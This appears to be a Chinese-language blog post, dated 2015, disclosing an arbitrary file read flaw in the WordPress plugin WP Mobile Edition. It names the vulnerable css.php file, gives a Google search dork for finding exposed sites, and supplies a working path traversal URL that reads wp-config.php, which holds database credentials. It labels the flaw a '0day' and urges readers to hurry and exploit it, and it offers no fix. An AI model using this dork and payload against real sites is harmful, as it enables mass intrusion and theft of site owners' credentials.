WP Mobile Edition插件远程文件读取漏洞

简介: WP Mobile Edition是WordPress一个手机主题,当用户手机访问时,打开网站就是手机版,以易用性和界面友好被很多个人和公司所使用.

由于WP Mobile Edition 没有对其参数进行过滤,所以导致此次漏洞产生.具体引发文件

themes/mTheme-Unus/css/css.php

Googlehacking 关键字

inurl:?fdx_switcher=mobile

POC:

读取wp-config.php文件源代码

http://www.sitedirsec.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

0day, 速度去L

CopyRight www.sitedirsec.com, Wild Dylan copy at 2015-4-24

你可能感兴趣的:(WP Mobile Edition插件远程文件读取漏洞)